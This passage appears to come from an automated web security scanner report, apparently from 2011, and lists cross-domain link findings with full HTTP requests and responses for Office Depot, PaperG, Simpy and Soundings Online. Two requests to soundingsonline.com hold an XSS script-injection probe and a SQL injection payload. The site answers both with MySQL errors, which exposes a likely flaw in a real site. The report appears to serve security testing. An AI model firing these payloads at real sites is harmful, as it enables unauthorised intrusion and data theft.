  • http://static.www.odcdn.com/N1804756861/css/od/print.css
  • http://static.www.odcdn.com/N203069267/css/od/bubble.css
  • http://static.www.odcdn.com/N444029864/css/od/sitestyle.css
  • http://static.www.odcdn.com/N931576568/css/od/master.css
  • http://static.www.odcdn.com/images/us/od/37005_od_rubicks_footer.png
  • http://static.www.odcdn.com/images/us/od/brand.gif
  • http://static.www.odcdn.com/images/us/od/common/misc/clear.gif
  • http://static.www.odcdn.com/images/us/od/favicon.ico
  • http://static.www.odcdn.com/images/us/od/rss/feed_icon_16x16.gif
  • http://static.www.odcdn.com/images/us/od/tiles/od_nav_menu_prvt_tile.gif
  • http://www.ativaproducts.com/?SID=null&odserver=www.officedepot.com
  • http://www.mystarteacher.com/?SID=ODjejhlyFxrngvsFyFgmYei&odserver=www.officedepot.com&SID=null&odserver=www.officedepot.com
  • http://www.officedepot.ca/?SID=null&odserver=www.officedepot.com
  • http://www.officedepotfoundation.org/?SID=null&odserver=www.officedepot.com
  • http://www.officedepotlistens.com/websurvey/index.htm?SID=null&odserver=www.officedepot.com
  • http://www.officedepotracing.com/?SID=null&odserver=www.officedepot.com
  • http://www.school.com/?SID=null&odserver=www.officedepot.com
  • http://www.techdepot.com/?SID=null&odserver=www.officedepot.com
  • http://www.worklifereward.com/?SID=null&odserver=www.officedepot.com
  • https://officedepot.support.com/feature/pccheckup-online?SID=null&odserver=www.officedepot.com
  • https://www.web-rebates.com/officedepot?SID=null&odserver=www.officedepot.com

Request

GET /promo.do?file=/promo/pages/0928_recycling.jsp HTTP/1.1
Host: www.officedepot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml"
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Tue, 25 Jan 2011 05:04:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=00002h8pqL-kKjohUfB_dlmEiD4:13ddq0tfm; Path=/
Set-Cookie: jsession_unique_id=1295931849796; Expires=Tue, 25 Jan 2011 06:34:09 GMT; Path=/
Set-Cookie: CU_BRAND=OD; Expires=Fri, 20 Jan 2012 05:04:09 GMT; Path=/
Set-Cookie: IBSD_LOCALE=en_US; Expires=Fri, 20 Jan 2012 05:04:09 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=2h8pqL-kKjohUfB_dlmEiD4; Expires=Thu, 24 Feb 2011 05:04:09 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=2h8pqL-kKjohUfB_dlmEiD4; Expires=Thu, 24 Feb 2011 05:04:09 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=2h8pqL-kKjohUfB_dlmEiD4; Expires=Thu, 24 Feb 2011 05:04:09 GMT; Path=/
Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com
Content-Length: 76566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html class="nojs" xmlns=
...[SNIP]...
</script>
<link rel="stylesheet" type="text/css" media="screen" href="http://static.www.odcdn.com/N931576568/css/od/master.css" />

   <link rel="stylesheet" type="text/css" media="print" href="http://static.www.odcdn.com/N1804756861/css/od/print.css" />

   
                       <link rel="stylesheet" type="text/css" media="screen" href="http://static.www.odcdn.com/1481705167/css/od/speciallinks.css" />

       
           <link rel="stylesheet" type="text/css" media="screen" href="http://static.www.odcdn.com/N444029864/css/od/sitestyle.css" />

       
           <link rel="stylesheet" type="text/css" media="screen" href="http://static.www.odcdn.com/N203069267/css/od/bubble.css" />

       
           <!--[if lt IE 7 ]>
...[SNIP]...
</script>
<script type="text/javascript" src="http://static.www.odcdn.com/N136538418/bundles/lib.js" ></script>

   
                                <script type="text/javascript" src="http://static.www.odcdn.com/1485153267/includes/customerservice.js" ></script>
...[SNIP]...
</script>
   

                                                           <link rel="shortcut icon" href="http://static.www.odcdn.com/images/us/od/favicon.ico" type="image/vnd.microsoft.icon"/>
       <link rel="icon" href="http://static.www.odcdn.com/images/us/od/favicon.ico" type="image/vnd.microsoft.icon"/>
       <link rel="alternate" type="application/rss+xml" title="Office Depot" href="http://feeds.feedburner.com/OfficeDepot"/>
       
   
       <link title="Office Depot" rel="search" type="application/opensearchdescription+xml" href="http://www.officedepot.com/en_US_od_business_accelerator_search.xml"/>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://static.www.odcdn.com/1421577119/bundles/cm.js" ></script>
...[SNIP]...
<li class=" language"><a href="http://www.officedepot.ca?SID=null&odserver=www.officedepot.com">Canada (English)</a>
...[SNIP]...
<a href="/;jsessionid=00002h8pqL-kKjohUfB_dlmEiD4:13ddq0tfm" id="logo" class=""><img src="http://static.www.odcdn.com/images/us/od/brand.gif" alt="OfficeDepot.com - Taking Care Of Business. Office Supplies, Furniture, Technology & More!" title="OfficeDepot.com - Taking Care Of Business. Office Supplies, Furniture, Technology & More!" /></a>
...[SNIP]...
<a id="v2_navtop_office_supplies" href="/adRedir.do;jsessionid=00002h8pqL-kKjohUfB_dlmEiD4:13ddq0tfm?ciid=12157&redirect=false"><img src="http://static.www.odcdn.com/images/us/od/tiles/od_nav_menu_prvt_tile.gif" height="30" width="372" border="0" alt="Save On Office Depot Brand Products!"></a>
...[SNIP]...
<div class="nav_menu_footer"><img src="http://static.www.odcdn.com/images/us/od/common/misc/clear.gif" alt="" class="corner" /><div><img src="http://static.www.odcdn.com/images/us/od/common/misc/clear.gif" alt="" class="bottom" /></div>
...[SNIP]...
<div class="nav_menu_footer"><img src="http://static.www.odcdn.com/images/us/od/common/misc/clear.gif" alt="" class="corner" /><div><img src="http://static.www.odcdn.com/images/us/od/common/misc/clear.gif" alt="" class="bottom" /></div>
...[SNIP]...
<div class="nav_menu_footer"><img src="http://static.www.odcdn.com/images/us/od/common/misc/clear.gif" alt="" class="corner" /><div><img src="http://static.www.odcdn.com/images/us/od/common/misc/clear.gif" alt="" class="bottom" /></div>
...[SNIP]...
<li><a href="https://officedepot.support.com/feature/pccheckup-online?SID=null&odserver=www.officedepot.com" class="">Free PC Checkup</a>
...[SNIP]...
<li><a href="http://officedepot.logoworks.com/?source=od.l7&SID=null&odserver=www.officedepot.com">Design Services</a>
...[SNIP]...
<li><a href="http://officedepot.lifepics.com/net/Default.aspx?SID=null&odserver=www.officedepot.com" target='new'>Photo Center</a>
...[SNIP]...
<div class="nav_menu_footer"><img src="http://static.www.odcdn.com/images/us/od/common/misc/clear.gif" alt="" class="corner" /><div><img src="http://static.www.odcdn.com/images/us/od/common/misc/clear.gif" alt="" class="bottom" /></div>
...[SNIP]...
<h5><a href="http://www.worklifereward.com/?SID=null&odserver=www.officedepot.com" target="_blank" class="">Worklife Rewards...</a>
...[SNIP]...
<p><a href="http://www.worklifereward.com/?SID=null&odserver=www.officedepot.com" class="">Join Today</a>
...[SNIP]...
<li><a href="http://www.officedepotfoundation.org/?SID=null&odserver=www.officedepot.com" target='_blank'>Community Involvement</a>
...[SNIP]...
<li><a href="http://www.officedepotracing.com?SID=null&odserver=www.officedepot.com" target='_blank'>Office Depot Racing</a>
...[SNIP]...
<li><a href="http://www.officedepotfoundation.org/?SID=null&odserver=www.officedepot.com" target='_blank'>Office Depot Foundation</a>
...[SNIP]...
<li><a href="http://www.officedepotlistens.com/websurvey/index.htm?SID=null&odserver=www.officedepot.com" target='_blank'>Customer Survey</a>
...[SNIP]...
<li class=""><a href="http://www.techdepot.com?SID=null&odserver=www.officedepot.com" target='_blank'>Tech Depot</a>
...[SNIP]...
<li><a href="http://www.ativaproducts.com?SID=null&odserver=www.officedepot.com" target='_blank'>Ativa...</a>
...[SNIP]...
<li class=""><a href="http://www.worklifereward.com/?SID=null&odserver=www.officedepot.com" target='_blank'>Worklife Rewards..</a>
...[SNIP]...
<li><a href="https://www.web-rebates.com/officedepot?SID=null&odserver=www.officedepot.com" target='_blank'>Mail-in Savings Center</a>
...[SNIP]...
<li><a href="http://www.mystarteacher.com/?SID=ODjejhlyFxrngvsFyFgmYei&odserver=www.officedepot.com&SID=null&odserver=www.officedepot.com" target='_blank'>Star Teacher</a>
...[SNIP]...
<li><a href="http://www.school.com/?SID=null&odserver=www.officedepot.com" target='_blank'>School.com</a>
...[SNIP]...
<div class="cube">
           <img src="http://static.www.odcdn.com/images/us/od/37005_od_rubicks_footer.png" alt="OfficeDepot.com - Taking Care Of Business. Office Supplies, Furniture, Technology & More!" title="OfficeDepot.com - Taking Care Of Business. Office Supplies, Furniture, Technology & More!" border="0" />
</div>
...[SNIP]...
<span id="rssIcon">
   <a href="http://feeds.feedburner.com/OfficeDepot"><img src="http://static.www.odcdn.com/images/us/od/rss/feed_icon_16x16.gif" alt="RSS Feed Icon" title="RSS Feed Icon" border="0" /></a>
...[SNIP]...
</span>

   
                       <script type='text/javascript' src='//static.atgsvcs.com/js/atgsvcs.js'></script>
...[SNIP]...

20.701. https://www.paperg.com/post.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /post.php

Issue detail

The page was loaded from a URL containing a query string:
  • https://www.paperg.com/post.php?bid=2123&pid=3922&post
The response contains the following links to other domains:
  • https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
  • https://ssl.google-analytics.com/urchin.js

Request

GET /post.php?bid=2123&pid=3922&post HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 05:04:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
       
       
       <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</div>
       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...

20.702. http://www.simpy.com/simpy/LinkAdd.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.simpy.com
Path:   /simpy/LinkAdd.do

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.simpy.com/simpy/LinkAdd.do?href={u}&title={t}
The response contains the following links to other domains:
  • http://aboutreuters.custhelp.com/cgi-bin/aboutreuters.cfg/php/enduser/ask.php
  • http://statse.webtrendslive.com/dcsncwimc10000kzgoor3wv9x_3f2v/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.6.0

Request

GET /simpy/LinkAdd.do?href={u}&title={t} HTTP/1.1
Host: www.simpy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:28:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Set-Cookie: SSLB=A;path=/;domain=www.reuters.com;
Content-Length: 4255

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: s263567nj2el88.uswhwk6.savvis.net <![endif]-->
<!--[if !IE]> token: d05c62e0-cc08-4af7-b
...[SNIP]...
<p>If you still can't find what you're looking for, you may wish to send a message to the <a href="http://aboutreuters.custhelp.com/cgi-bin/aboutreuters.cfg/php/enduser/ask.php">Help Desk</a>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsncwimc10000kzgoor3wv9x_3f2v/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.6.0"/></div>
...[SNIP]...

20.703. http://www.soundingsonline.com/archives

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.soundingsonline.com/archives?'"--></style></script><script>alert(0x001E2B)</script>
The response contains the following links to other domains:
  • http://b.collective-media.net/seg/cm/de18_1
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
  • http://www.barkerstores.com/soundings
  • http://www.barkerstores.com/soundings/
  • http://www.dominionenterprises.com/main/do/Privacy_Policy
  • http://www.dominionenterprises.com/main/do/Terms_of_Use
  • http://www.paperg.com/
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123
  • http://www.soundingssellmyboat.com/

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:27:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:27:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

20.704. http://www.soundingsonline.com/component/chronocontact/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage
The response contains the following links to other domains:
  • http://b.collective-media.net/seg/cm/de18_1
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=51M&SOURCE=INT75&RDRID=&SBTYPE=QN&PGTP=S
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=58g&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
  • http://www.barkerstores.com/soundings
  • http://www.barkerstores.com/soundings/
  • http://www.chronoengine.com/
  • http://www.dominionenterprises.com/main/do/Privacy_Policy
  • http://www.dominionenterprises.com/main/do/Terms_of_Use
  • http://www.paperg.com/
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123
  • http://www.soundingssellmyboat.com/

Request

GET /component/chronocontact/?chronoformname=PSPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=58g&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"> <img src="/images/cgaux_graphics/SND.Jul.09.jpg" width="100" border="0" height="135" />
...[SNIP]...
<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=51M&SOURCE=INT75&RDRID=&SBTYPE=QN&PGTP=S"><img src="/images/cgaux_graphics/trade_1008_cover_100p.jpg" width="100" border="0" height="135" />
...[SNIP]...
<div class="chronoform">
<a href="http://www.chronoengine.com">Joomla Professional Work</a>
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

20.705. http://www.soundingsonline.com/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Itemid=111
The response contains the following links to other domains:
  • http://b.collective-media.net/seg/cm/de18_1
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
  • http://www.barkerstores.com/soundings
  • http://www.barkerstores.com/soundings/
  • http://www.boats.com/
  • http://www.boattrader.com/
  • http://www.dominionenterprises.com/main/do/Privacy_Policy
  • http://www.dominionenterprises.com/main/do/Terms_of_Use
  • http://www.paperg.com/
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123
  • http://www.soundingssellmyboat.com/
  • http://www.yachtworld.com/

Request

GET /index.php?option=com_content&view=category&layout=blog&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Itemid=111 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:33:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:33:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
<td style="text-align: left;"><a href="http://www.boats.com"><img src="/images/buttons/boatscom.jpg" style="border: medium none; float: right;" />
...[SNIP]...
<br /><a href="http://www.boattrader.com"><img src="/images/buttons/boattrader.jpg" style="border: medium none; float: right;" />
...[SNIP]...
<br /><a href="http://www.yachtworld.com"><img style="border: medium none; float: right;" src="/images/buttons/yachtworld.jpg" />
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
